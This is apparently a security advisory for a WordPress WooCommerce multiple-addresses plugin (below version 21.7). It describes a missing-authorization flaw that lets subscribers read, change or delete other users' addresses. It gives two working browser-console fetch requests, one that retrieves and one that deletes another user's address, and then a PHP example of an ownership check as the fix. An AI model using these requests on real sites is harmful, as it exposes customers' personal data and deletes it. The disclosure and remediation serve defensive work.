The plugin does not ensure that the address to add/update/retrieve/delete/duplicate belongs to the user making the request, or that the request comes from a high-privilege user. This allows any authenticated user, such as a subscriber, to add/update/duplicate/delete as well as retrieve the addresses of other users.
Run the commands below in the web browser's developer console while on the blog as a subscriber user (note: the addresses manipulated are those added via the plugin, not WooCommerce's own).

To retrieve the first address of the user with ID 1750:

```js
fetch("/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "method": "POST",
  "body": "action=wcmca_get_address_by_id&address_id=0&user_id=1750",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

Other possible values for address_id: last_used_billing, last_used_shipping, checkout_data.

To delete the address with ID 1 of the user with ID 1750 (to be executed on the Edit Address page while logged in as a subscriber, e.g. http://example.com/my-account/edit-address/):

```js
fetch("/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "method": "POST",
  "body": "action=wcmca_delete_address&wcmca_delete_id=0&wcmca_user_id=1&wcmca_security_token=" + wcmca_address_form["security_token"],
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

It is also possible to add/update an address of an arbitrary user via the wcmca_save_new_address AJAX action.
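The second request above carries a valid nonce (`wcmca_security_token`) and still succeeds against another user's data, which is the core of the issue: a nonce proves the request came from the plugin's own form, not that the caller owns the `user_id` it names. The following is an added illustration of the missing check, not the plugin's code. The handler names (`example_*`), the nonce action `example_address_nonce` and the user-meta key `example_addresses` are assumptions; the WordPress functions used (`check_ajax_referer`, `get_current_user_id`, `current_user_can`, `wp_send_json_error`, `get_user_meta`) are real.

```php
<?php
/**
 * Added illustration of an ownership check for address AJAX handlers.
 * Not the plugin's code: handler names, nonce action and meta key are assumed.
 */

/**
 * May the current user operate on the addresses of $target_user_id?
 * Ownership is the default rule; a shop-management capability is the only
 * way to act on someone else's addresses.
 */
function example_user_may_access_addresses( $target_user_id ) {
    $current_user_id = get_current_user_id();
    if ( 0 === $current_user_id ) {
        return false; // anonymous requests never pass
    }
    if ( (int) $target_user_id === $current_user_id ) {
        return true; // the caller's own addresses
    }
    return current_user_can( 'manage_woocommerce' ); // privileged staff only
}

/**
 * Shared entry check for every address handler: valid nonce first, then the
 * ownership rule. Ends the request with a JSON error if either fails and
 * returns the user id the handler is allowed to work on.
 */
function example_require_address_access( $nonce_field, $user_id_field ) {
    // The nonce does not bind the request to the user_id parameter, so it
    // must be followed by the ownership check below.
    check_ajax_referer( 'example_address_nonce', $nonce_field );

    $target_user_id = isset( $_POST[ $user_id_field ] ) ? absint( $_POST[ $user_id_field ] ) : 0;
    if ( ! example_user_may_access_addresses( $target_user_id ) ) {
        wp_send_json_error( array( 'message' => 'You may only manage your own addresses.' ), 403 );
    }
    return $target_user_id;
}

add_action( 'wp_ajax_example_get_address_by_id', 'example_get_address_by_id' );
function example_get_address_by_id() {
    $user_id    = example_require_address_access( 'security_token', 'user_id' );
    $address_id = isset( $_POST['address_id'] ) ? sanitize_key( $_POST['address_id'] ) : '';

    // Assumed storage: an array of addresses in user meta, keyed by address id.
    $addresses = get_user_meta( $user_id, 'example_addresses', true );
    if ( ! is_array( $addresses ) || ! isset( $addresses[ $address_id ] ) ) {
        wp_send_json_error( array( 'message' => 'Address not found.' ), 404 );
    }
    wp_send_json_success( $addresses[ $address_id ] );
}

add_action( 'wp_ajax_example_delete_address', 'example_delete_address' );
function example_delete_address() {
    $user_id    = example_require_address_access( 'security_token', 'user_id' );
    $address_id = isset( $_POST['delete_id'] ) ? sanitize_key( $_POST['delete_id'] ) : '';

    $addresses = get_user_meta( $user_id, 'example_addresses', true );
    if ( ! is_array( $addresses ) || ! isset( $addresses[ $address_id ] ) ) {
        wp_send_json_error( array( 'message' => 'Address not found.' ), 404 );
    }
    unset( $addresses[ $address_id ] );
    update_user_meta( $user_id, 'example_addresses', $addresses );
    wp_send_json_success( array( 'deleted' => $address_id ) );
}
```

Because `wp_send_json_error()` ends the request, nothing after a failed check runs; routing every handler (add, update, duplicate, delete, retrieve) through the same `example_require_address_access()` call is what keeps one forgotten handler from reopening the hole. When reviewing a fix for this class of bug, confirm that the resolved user id used for the storage lookup is the one that passed the ownership check, not a second copy read from the request.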
CPE | Name | Operator | Version |
---|---|---|---|
| | woocommerce-multiple-customer-addresses | lt | 21.7 |